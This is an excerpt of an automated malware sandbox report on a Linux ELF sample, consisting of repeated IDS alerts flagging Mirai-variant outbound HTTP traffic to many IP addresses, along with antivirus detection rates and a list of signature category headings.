ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.175.243.56

Timestamp:	192.168.2.15112.175.243.5660060802839471 02/14/24-09:28:47.077014
SID:	2839471
Source Port:	60060
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.163.217.73

Timestamp:	192.168.2.1595.163.217.7343390802839471 02/14/24-09:30:19.421156
SID:	2839471
Source Port:	43390
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.214.134.48

Timestamp:	192.168.2.1595.214.134.4852658802839471 02/14/24-09:29:24.833034
SID:	2839471
Source Port:	52658
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.153.45.136

Timestamp:	192.168.2.1595.153.45.13652326802839471 02/14/24-09:30:14.754813
SID:	2839471
Source Port:	52326
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.188.30

Timestamp:	192.168.2.1595.101.188.3035808802839471 02/14/24-09:29:56.736509
SID:	2839471
Source Port:	35808
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.158.24.64

Timestamp:	192.168.2.1595.158.24.6460290802839471 02/14/24-09:30:19.417837
SID:	2839471
Source Port:	60290
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.221.133.91

Timestamp:	192.168.2.15112.221.133.9153166802839471 02/14/24-09:29:29.476153
SID:	2839471
Source Port:	53166
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.170.92.20

Timestamp:	192.168.2.1595.170.92.2049376802839471 02/14/24-09:30:09.848136
SID:	2839471
Source Port:	49376
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.186.69.72

Timestamp:	192.168.2.15112.186.69.7241012802839471 02/14/24-09:30:59.252865
SID:	2839471
Source Port:	41012
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.29.170.239

Timestamp:	192.168.2.15112.29.170.23946436802839471 02/14/24-09:29:06.146720
SID:	2839471
Source Port:	46436
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.170.66.222

Timestamp:	192.168.2.1595.170.66.22239634802839471 02/14/24-09:30:41.244571
SID:	2839471
Source Port:	39634
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.198.55.121

Timestamp:	192.168.2.15112.198.55.12144878802839471 02/14/24-09:29:29.505273
SID:	2839471
Source Port:	44878
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.47.145

Timestamp:	192.168.2.1588.221.47.14555876802839471 02/14/24-09:29:33.666096
SID:	2839471
Source Port:	55876
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.56.127.179

Timestamp:	192.168.2.1595.56.127.17951830802839471 02/14/24-09:29:19.093571
SID:	2839471
Source Port:	51830
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.145.165

Timestamp:	192.168.2.1595.217.145.16549690802839471 02/14/24-09:29:47.818025
SID:	2839471
Source Port:	49690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.247.127

Timestamp:	192.168.2.1595.101.247.12743780802839471 02/14/24-09:29:51.437945
SID:	2839471
Source Port:	43780
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.13.121.101

Timestamp:	192.168.2.15112.13.121.10151690802839471 02/14/24-09:30:04.630815
SID:	2839471
Source Port:	51690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.169.188.17

Timestamp:	192.168.2.1595.169.188.1737016802839471 02/14/24-09:31:13.059075
SID:	2839471
Source Port:	37016
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.203.250

Timestamp:	192.168.2.1595.101.203.25038158802839471 02/14/24-09:30:09.850044
SID:	2839471
Source Port:	38158
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.179.146.203

Timestamp:	192.168.2.1595.179.146.20359722802839471 02/14/24-09:30:44.413481
SID:	2839471
Source Port:	59722
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.63.12.223

Timestamp:	192.168.2.1588.63.12.22350630802839471 02/14/24-09:30:00.971656
SID:	2839471
Source Port:	50630
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.75.213

Timestamp:	192.168.2.1595.100.75.21356082802839471 02/14/24-09:30:31.540515
SID:	2839471
Source Port:	56082
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.166.250.5

Timestamp:	192.168.2.15112.166.250.545294802839471 02/14/24-09:29:03.354973
SID:	2839471
Source Port:	45294
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.218.158.213

Timestamp:	192.168.2.1588.218.158.21359262802839471 02/14/24-09:29:33.661619
SID:	2839471
Source Port:	59262
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.186.20.38

Timestamp:	192.168.2.15112.186.20.3860010802839471 02/14/24-09:31:05.727048
SID:	2839471
Source Port:	60010
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.220.172

Timestamp:	192.168.2.1595.101.220.17246160802839471 02/14/24-09:31:06.716395
SID:	2839471
Source Port:	46160
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.64.86

Timestamp:	192.168.2.1588.99.64.8642730802839471 02/14/24-09:29:51.033750
SID:	2839471
Source Port:	42730
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.163.53.162

Timestamp:	192.168.2.1595.163.53.16254374802839471 02/14/24-09:30:37.211438
SID:	2839471
Source Port:	54374
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

Joe Sandbox Signatures

• AV Detection
• Networking
• System Summary
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: E6l0C6FObI.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: E6l0C6FObI.elf	ReversingLabs: Detection: 65%
Source: E6l0C6FObI.elf	Virustotal: Detection: 66%			Perma Link

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58378 -> 88.221.78.210:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56704 -> 88.149.181.115:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53226 -> 88.119.167.115:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60060 -> 112.175.243.56:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35190 -> 112.180.15.84:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33812 -> 112.223.39.29:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43794 -> 112.135.211.255:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60120 -> 95.101.201.148:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45086 -> 95.100.127.15:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60806 -> 95.165.139.210:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52484 -> 95.47.167.65:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52620 -> 95.215.242.21:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54268 -> 95.86.78.146:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36418 -> 95.58.76.157:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34790 -> 95.111.218.63:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51906 -> 112.169.120.242:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52944 -> 112.166.212.55:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47280 -> 95.73.170.175:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55932 -> 95.100.203.69:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55572 -> 95.100.53.49:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57886 -> 95.79.128.165:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35078 -> 95.221.199.108:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57198 -> 95.35.40.90:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55624 -> 95.100.53.49:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51420 -> 112.135.219.68:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47730 -> 112.74.127.22:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52534 -> 112.74.59.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34772 -> 112.78.1.57:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55688 -> 112.105.38.98:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51472 -> 112.74.103.111:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45294 -> 112.166.250.5:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53522 -> 112.30.175.165:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59552 -> 112.196.74.193:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56052 -> 112.197.165.134:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39236 -> 112.168.50.100:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38690 -> 112.184.60.51:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53568 -> 112.47.11.210:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59116 -> 95.101.142.194:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60494 -> 95.110.224.250:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51392 -> 95.216.114.32:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42718 -> 95.255.93.92:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50714 -> 95.141.128.200:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53612 -> 112.47.11.210:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46436 -> 112.29.170.239:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43004 -> 95.100.105.189:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43532 -> 95.181.203.44:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58916 -> 95.153.253.45:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52464 -> 95.101.116.48:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57094 -> 95.49.0.208:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52274 -> 95.57.108.51:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42384 -> 95.100.251.107:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58964 -> 95.79.101.54:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55850 -> 112.126.91.177:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60442 -> 95.43.199.250:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40624 -> 95.100.185.37:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33430 -> 95.216.173.124:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59496 -> 95.56.209.43:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40722 -> 88.198.147.174:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40640 -> 95.100.185.37:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34948 -> 88.147.5.63:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34804 -> 112.216.115.50:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36962 -> 95.216.204.254:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35438 -> 95.163.141.100:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51830 -> 95.56.127.179:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49394 -> 95.58.75.221:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58368 -> 95.100.5.123:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60332 -> 88.220.84.186:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39906 -> 112.167.233.6:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36342 -> 112.159.70.238:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59886 -> 112.45.120.187:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59888 -> 112.45.120.187:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42252 -> 112.74.32.155:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33542 -> 95.210.96.55:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44210 -> 95.216.93.49:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46918 -> 95.101.3.191:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35212 -> 95.101.47.91:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35680 -> 95.216.240.143:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52658 -> 95.214.134.48:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58762 -> 95.100.182.224:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59590 -> 95.85.71.191:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48300 -> 112.168.102.29:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51780 -> 112.200.187.9:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34188 -> 112.213.39.95:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39526 -> 112.60.15.224:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53166 -> 112.221.133.91:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50462 -> 95.166.153.201:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44412 -> 95.217.236.46:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36510 -> 95.158.244.29:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36480 -> 88.12.95.45:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33758 -> 88.99.29.249:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44878 -> 112.198.55.121:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41502 -> 95.128.129.61:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50378 -> 95.111.232.93:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36194 -> 95.168.249.26:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48484 -> 95.56.57.210:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58608 -> 88.99.179.56:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59262 -> 88.218.158.213:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55876 -> 88.221.47.145:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59270 -> 88.218.158.213:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48162 -> 95.101.187.61:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43204 -> 95.101.221.66:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60372 -> 95.216.160.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57698 -> 95.101.14.86:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38516 -> 112.171.185.101:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47362 -> 88.10.162.12:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:32972 -> 95.211.247.164:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36812 -> 95.141.36.146:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46680 -> 95.217.87.47:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57376 -> 95.217.133.224:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39022 -> 95.59.50.19:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55130 -> 95.86.125.89:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45162 -> 95.59.121.53:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43550 -> 88.150.154.89:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57020 -> 95.127.222.121:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57918 -> 88.32.110.170:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39124 -> 95.217.80.174:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58794 -> 95.216.140.64:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34422 -> 95.217.25.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35420 -> 95.66.132.13:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53678 -> 88.203.250.100:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49690 -> 95.217.145.165:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39686 -> 112.177.57.8:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40938 -> 112.222.35.158:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45590 -> 112.132.215.153:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46576 -> 112.192.19.97:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59498 -> 112.197.81.187:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42730 -> 88.99.64.86:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43780 -> 95.101.247.127:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45228 -> 95.101.200.97:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48516 -> 95.100.189.25:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39986 -> 112.124.165.108:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39168 -> 95.101.181.53:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33192 -> 112.74.18.106:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58734 -> 95.101.16.151:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44014 -> 95.101.19.63:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44132 -> 95.217.150.108:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51720 -> 95.216.18.101:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34672 -> 95.217.203.251:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34484 -> 95.100.136.40:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51486 -> 95.80.219.174:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49402 -> 95.111.254.57:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49448 -> 95.100.51.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35808 -> 95.101.188.30:80
